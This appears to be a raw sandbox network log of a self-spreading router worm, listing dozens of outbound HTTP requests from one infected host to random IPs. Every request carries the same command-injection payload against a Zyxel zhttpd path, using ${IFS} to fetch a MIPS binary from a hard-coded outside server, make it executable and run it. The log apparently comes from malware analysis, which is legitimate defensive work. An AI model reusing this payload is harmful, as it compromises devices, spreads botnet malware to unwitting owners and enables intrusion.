                                                  Jan 19, 2024 18:23:44.825568914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1794192.168.2.1335004187.253.56.16443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.825609922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1795192.168.2.1359492140.144.11.81443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.825654984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1796192.168.2.1360588149.80.54.209443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.825690985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1797192.168.2.133599825.139.150.161443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.825733900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1798192.168.2.1357672170.129.235.231443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.825759888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1799192.168.2.1353930189.179.243.14443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.825809956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1800192.168.2.134943874.142.107.148443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.825851917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1801192.168.2.1349828176.86.136.46443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.825901985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1802192.168.2.1336762164.122.155.37443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.825928926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1803192.168.2.1347874184.1.254.238443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.825969934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1804192.168.2.1337842138.160.72.66443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.826025963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1805192.168.2.133842265.113.138.198443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.826082945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1806192.168.2.1355362111.129.169.42443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.826131105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1807192.168.2.1333338188.60.42.84443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.826167107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1808192.168.2.1352678216.195.230.169443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.826219082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1809192.168.2.13408549.100.12.20443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.826253891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1810192.168.2.1351716222.144.158.237443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.826299906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1811192.168.2.134193824.65.74.82443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.826329947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1812192.168.2.1360596113.45.10.252443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.826385975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1813192.168.2.1342408212.72.101.180443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.826419115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1814192.168.2.1356204168.226.86.166443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.826458931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1815192.168.2.134121619.202.69.20443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.826507092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1816192.168.2.1333630141.252.125.223443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.826555967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1817192.168.2.1356960110.161.105.38443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.826611042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1818192.168.2.135793812.79.234.178443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.826622009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1819192.168.2.134435886.22.136.91443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.826647997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1820192.168.2.135441270.177.3.144443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.826689959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1821192.168.2.1354394184.212.65.131443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.826715946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1822192.168.2.133465677.52.167.125443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.826752901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1823192.168.2.133560857.47.105.246443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.826775074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1824192.168.2.1355858110.171.76.127443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.826797962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1825192.168.2.1349472108.127.95.191443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.826827049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1826192.168.2.135038819.179.57.104443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.826886892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1827192.168.2.134415635.213.197.38443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.826910019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1828192.168.2.1339102191.32.147.103443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.826939106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1829192.168.2.1351098176.208.179.19443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.826993942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1830192.168.2.134648296.40.51.3443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.827025890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1831192.168.2.1339788213.140.67.50443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.827058077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1832192.168.2.135597641.179.219.85443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.827100039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1833192.168.2.1351644156.203.244.141443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.827130079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1834192.168.2.1358744124.168.82.33443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.827152967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1835192.168.2.1348366187.137.165.233443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.827176094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1836192.168.2.1337278220.131.234.252443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.827230930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1837192.168.2.133575866.24.58.99443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.827248096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1838192.168.2.1335784208.22.183.253443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.827301025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1839192.168.2.1351106187.237.73.203443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.827337980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1840192.168.2.133575694.159.68.112443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.827367067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1841192.168.2.1345928212.56.97.225443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.827424049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1842192.168.2.1349220168.37.205.141443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.827465057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1843192.168.2.1348098210.170.135.80443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.827493906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1844192.168.2.135764235.252.163.195443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.827533960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1845192.168.2.1348482164.203.200.213443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.827574015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1846192.168.2.1337706206.68.103.13443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.827627897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1847192.168.2.1360754155.79.56.137443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.827636003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1848192.168.2.1354076203.110.11.100443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.827706099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1849192.168.2.1335186114.110.63.82443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.827734947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1850192.168.2.1334926143.129.198.81443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.827776909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1851192.168.2.1348018221.174.255.3443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.827826023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1852192.168.2.135571232.54.215.64443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.827869892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1853192.168.2.1355726210.129.179.36443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.827900887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1854192.168.2.134370497.224.13.109443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.827927113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1855192.168.2.135229897.166.114.54443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:44.827963114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1856192.168.2.1346448195.225.166.211443
                                                  TimestampBytes transferredDirectionData
